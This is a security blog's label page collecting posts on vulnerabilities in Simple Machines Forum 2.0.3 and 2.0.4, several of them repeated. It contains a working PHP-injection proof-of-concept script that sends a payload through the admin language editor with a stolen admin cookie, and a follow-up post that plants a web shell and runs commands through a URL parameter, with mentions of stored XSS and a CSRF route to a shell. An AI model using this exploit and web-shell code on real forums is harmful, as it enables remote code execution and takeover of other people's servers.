In latest version of SMF I found a tricky XSS vulnerability.
As the vendor said, this is a low priority, because it can be exploited
only when admin user is logged in.
Post will be updated after patch release (in new version).
Showing posts with label smf. Show all posts
Showing posts with label smf. Show all posts
Friday, 31 January 2014
Thursday, 1 August 2013
[EN] SMF 2.0.4 PHP Injection - part 2
Durning last few weeks a lot of you asked me about how to add shell via this PHP injection
vulnerability.
I decide to publish another poc-code to show you how it can be done (but I believe
that few of you can code better php-ideas than me ;) )
Anyway, as it was described here and here, try to add - as this 'poc-php-code' - line
like this one:
---< code >---
en_US\';system($_REQUEST[a]);//
---< code >---
Next step to do is go directly to your (changed) file and add an 'a' parameter with
value equal to Bash command :)
Try it:
http://192.168.255.105/smf2.0.4/Themes/default/languages/index.english.php?a=echo%20%27%3Cpre%3E%27;ls%20-la%20;%20echo%20%27%3C/pre%3E%27
Now it will be possible to create a working web-shell.
Let me know via email or comments again if you have other ideas how this attack can be extended. ;)
Cheers!
o/
vulnerability.
I decide to publish another poc-code to show you how it can be done (but I believe
that few of you can code better php-ideas than me ;) )
Anyway, as it was described here and here, try to add - as this 'poc-php-code' - line
like this one:
---< code >---
en_US\';system($_REQUEST[a]);//
---< code >---
Next step to do is go directly to your (changed) file and add an 'a' parameter with
value equal to Bash command :)
Try it:
http://192.168.255.105/smf2.0.4/Themes/default/languages/index.english.php?a=echo%20%27%3Cpre%3E%27;ls%20-la%20;%20echo%20%27%3C/pre%3E%27
Now it will be possible to create a working web-shell.
Let me know via email or comments again if you have other ideas how this attack can be extended. ;)
Cheers!
o/
Tuesday, 23 April 2013
[EN] p0c php injection in SMF 2.0.4
Thanks for all mails about 'how to inject php code in latest smf'! I'm glad that you're reading my blog. ;)
Below is simple proof-of-concept code. Remember to replace 2 values: cookie, and path to your SMF installation. In other way, code will not work. ;)
PoC in PHP:
---8<---
<?php
// proof of concept that latest SMF (2.0.4) can be exploited by php injection.
// payload code must escape from \', so you should try with something like that:
// p0c\';phpinfo();// as a 'dictionary' value. Same story for locale parameter.
// For character_set - another story, as far as I remember, because here we have
// a nice stored xss. ;)
// 21/04/2013
// http://HauntIT.blogspot.com
// to successfully exploit smf 2.0.4 we need correct admin's cookie:
$cookie = 'SMFCookie956=allCookiesHere';
$ch = curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
curl_setopt($ch, CURLOPT_POSTFIELDS, "character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$page = curl_exec($ch);
echo 'PHP code:<br>'.$page;
curl_close($ch); // to close 'logged-in' part
?>
--->8---
And pastebin version :)
Remember to test only your SMF! ;)
o/
Below is simple proof-of-concept code. Remember to replace 2 values: cookie, and path to your SMF installation. In other way, code will not work. ;)
PoC in PHP:
---8<---
<?php
// proof of concept that latest SMF (2.0.4) can be exploited by php injection.
// payload code must escape from \', so you should try with something like that:
// p0c\';phpinfo();// as a 'dictionary' value. Same story for locale parameter.
// For character_set - another story, as far as I remember, because here we have
// a nice stored xss. ;)
// 21/04/2013
// http://HauntIT.blogspot.com
// to successfully exploit smf 2.0.4 we need correct admin's cookie:
$cookie = 'SMFCookie956=allCookiesHere';
$ch = curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_POST, 1); // send as POST (to 'On')
curl_setopt($ch, CURLOPT_POSTFIELDS, "character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$page = curl_exec($ch);
echo 'PHP code:<br>'.$page;
curl_close($ch); // to close 'logged-in' part
?>
--->8---
And pastebin version :)
Remember to test only your SMF! ;)
o/
Monday, 25 March 2013
[EN] Exploit for latest SMF 2.0.4
Hi.
In this week I will publish few new informations about vulnerabilities I found.
For example full technical details about vulnerable (latest) version of SMF 2.0.4 will be available after contact with vendor.
*update:*
I see that in some cases there is a possibility to drop a (web)shell via CSRF attack.
Post will be updated, so...
See you soon! ;)
In this week I will publish few new informations about vulnerabilities I found.
For example full technical details about vulnerable (latest) version of SMF 2.0.4 will be available after contact with vendor.
*update:*
I see that in some cases there is a possibility to drop a (web)shell via CSRF attack.
Post will be updated, so...
See you soon! ;)
Monday, 14 January 2013
[EN] SMF 2.0.3 Persistent XSS
For admin user this time ;)
Details here: http://whk.drawcoders.net/
At this point I would like to thanks all SMF Team for cooperating.
Fast and responsible Team! :)
 |
| Persistent XSS in latest SMF 2.0.3 |
Details here: http://whk.drawcoders.net/
At this point I would like to thanks all SMF Team for cooperating.
Fast and responsible Team! :)
Subscribe to:
Posts (Atom)